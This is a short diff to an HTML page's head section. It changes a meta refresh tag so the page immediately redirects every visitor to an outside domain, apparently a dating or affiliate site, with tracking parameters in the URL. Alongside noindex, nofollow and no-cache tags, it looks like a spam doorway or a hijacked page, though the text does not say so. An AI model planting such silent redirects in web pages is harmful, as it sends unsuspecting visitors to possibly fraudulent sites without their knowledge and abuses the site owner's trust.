--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
   <meta name="robots" content="noindex">
   <meta name="robots" content="nofollow">
   <meta http-equiv="cache-control" content="no-cache">
-  <meta http-equiv="REFRESH" content="20;URL=">
+  <meta http-equiv="REFRESH" content="0;URL=https://realdatinghere.life/?u=gyqpd06&o=5ppk29b">
 </head>
 
 <body>
